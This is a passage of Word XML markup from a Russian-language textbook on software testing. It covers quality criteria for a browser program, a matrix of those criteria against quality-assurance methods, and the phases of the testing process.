      <w:r w:rsidRPr="00617AC0">
        <w:lastRenderedPageBreak/>
        <w:t>В рамках подобной задачи группа тестирования рассматривается не просто как еще одна заинтересованная сторона, но и как сторона, способная оценить удовлетворение выбранных критериев и сделать вывод о качестве продукта с точки зрения других участников. К сожалению, далеко не все критерии могут быть оценены группой тестирования. Поэтому ее внимание в основном сосредоточено на критериях, определяющих качество программного продукта с точки зрения конечного пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Тестирование как способ обеспечения качества.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> Тестирование, с технической точки зрения, есть процесс выполнения приложения на некоторых входных данных и проверка получаемых результатов с целью подтвердить их корректность по отношению к результату.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Тестирование не позиционируется в качестве единственного способа обеспечения качества. Оно является частью общей системы обеспечения качества продукта, элементы которой выбираются по критерию наибольшей эффективности применения в конкретном проекте.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Рассмотрим пример. В качестве приложения возьмем программу для работы с сетью (browser), критерии качества которой приведены в </w:t>
      </w:r>
      <w:hyperlink r:id="rId376" w:anchor="table.9.1" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Табл..1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Таблица.1. Критерии качества программы browser</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4963"/>
        <w:gridCol w:w="1614"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="2077"/>
      </w:tblGrid>
      <w:tr w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidTr="00434EE5">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434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>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Пользователь</w:t>
            </w:r>
          </w:p>
        </w:tc>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Заказчик</w:t>
            </w:r>
          </w:p>
        </w:tc>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Инженер поддержки</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidTr="00434E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Функциональная полнота</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Цена разработки</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Отсутствие дефектов</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Косвенно</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Удобство использования</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Возможность внесения изменений в будущем</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Косвенно</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Легкость исправления дефектов</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Документация на реализацию, в том числе комментарии</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rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Своевременность исполнения проекта</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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Матрица критериев качества заинтересованных в них участников для рассматриваемого проекта приведена в </w:t>
      </w:r>
      <w:hyperlink r:id="rId377" w:anchor="table.9.2" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>табл..2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> . Допустим, что вид матрицы критериев качества и проверяющих элементов системы обеспечения качества для данного проекта будет следующим:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Таблица 2. Матрица критериев качества и элементов системы обеспечения качества</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3164"/>
        <w:gridCol w:w="1633"/>
        <w:gridCol w:w="1661"/>
        <w:gridCol w:w="1008"/>
        <w:gridCol w:w="1032"/>
        <w:gridCol w:w="1356"/>
      </w:tblGrid>
      <w:tr w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidTr="00434EE5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3510" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1397"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Тестирование</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700"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Анализ рынка и специальные лаборатории</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885"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Обзоры кода</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986"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Анализ дизайна</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1186"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Аудиты процесса разработки</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidTr="00434EE5">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Полнота функциональности</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1397"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 не всегда эффективно</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700"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885"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9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1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Стоимость разработки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1397"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700"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885"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9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1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Отсутствие дефектов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1397"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700"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885"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9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1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Удобство использования</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1397"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 не всегда эффективно</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700"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885"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9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1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Возможность внесения изменений в будущем</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1397"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700"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885"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9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1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Легкость исправления дефектов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1397"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700"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885"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9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1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Документация на реализацию, в том числе комментарии</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1397"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700"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885"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9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1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r>
      <w:tr w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidTr="00434EE5">
        <w:trPr>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434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Своевременность исполнения проекта</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1397"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700"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885"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9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c>
          <w:tcPr>
            <w:tcW w:w="1186" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Данные (</w:t>
      </w:r>
      <w:hyperlink r:id="rId378" w:anchor="table.9.1" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Табл.1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId379" w:anchor="table.9.2" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Табл..2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:t>) показывают, что из восьми элементов общего качества продукта тестирование способно оценить и контролировать только три (1, 3, 4), причем наиболее эффективно тестирование контролирует отсутствие дефектов (3).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:lastRenderedPageBreak/>
        <w:t>В каждом конкретном проекте элементы системы должны быть выбраны так, чтобы обеспечить приемлемое качество, исходя из приоритетов и имеющихся ресурсов. Выбирая элементы для системы обеспечения качества конкретного продукта, можно применить комбинированное тестирование, обзоры кода, аудит. При подобном выборе некоторые качества, например легкость модификации и исправления дефектов, не будут оценены и, возможно, выполнены. Задачей тестирования в рассматриваемом случае будет обнаружение дефектов и оценка удобства использования продукта, включая полноту функциональности. Исходя из задач, поставленных перед группой тестирования в конкретном проекте, выбирается соответствующая стратегия тестирования. Так, в данном примере, ввиду необходимости оценить удобство использования и полноту функциональности, преимущественный подход к разработке тестов следует планировать на основе использования сценариев.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Итак, основная последовательность действий при выборе и оценке критериев качества программного продукта включает:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Определение всех лиц, так или иначе заинтересованных в исполнении и результатах данного проекта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Определение критериев, формирующих представление о качестве для каждого из участников.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Приоритезацию критериев, с учетом важности конкретного участника для компании, выполняющей проект, и важности каждого из критериев для данного участника.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Определение набора критериев, которые будут отслежены и выполнены в рамках проекта, исходя из приоритетов и возможностей проектной команды. Постановка целей по каждому из критериев.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Определение способов и механизмов достижения каждого критерия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Определение стратегии тестирования исходя из набора критериев, попадающих под ответственность группы тестирования, выбранных приоритетов и целей</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="158" w:name="sect2"/>
      <w:bookmarkEnd w:id="158"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Процесс тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Как отмечалось в подразделе 2.4, в тестировании выделяются три основных уровня, или три фазы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Модульное тестирование.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Интеграционное тестирование.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Системное тестирование.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Задача планирования активности тестирования состоит в оптимальном распределении ресурсов между всеми типами тестирования. В дальнейшем изложении мы сконцентрируемся на системной фазе тестирования, как на наиболее важной и критичной активности для разработки качественного программного продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name="sect3"/>
      <w:bookmarkEnd w:id="159"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Фазы процесса тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>В процессе тестирования выделяют следующие фазы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Определение целей</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (требований к тестированию), включающее следующую конкретизацию: какие части системы будут тестироваться, какие аспекты их работы будут выбраны для проверки, каково желаемое качество и т.п.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Планирование</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: создание графика (расписания) разработки тестов для каждой тестируемой подсистемы; оценка необходимых человеческих, программных и аппаратных ресурсов; разработка расписания </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>тестовых циклов</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Важно отметить, что расписание тестирования обязательно должно быть согласовано с расписанием разработки создаваемой системы, поскольку наличие исполняемой версии разрабатываемой системы (</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Implementation Under Testing (IUT)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Application Under Testing (AUT)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – часто употребляемые обозначения для тестируемой системы) является одним из необходимых условий тестирования, что создает взаимозависимость в работе команд тестировщиков и разработчиков.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Разработка тестов</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, то есть тестового кода для тестируемой системы, если необходимо - кода системы автоматизации тестирования и тестовых процедур (выполняемых вручную).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выполнение тестов</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: реализация </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>тестовых циклов</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
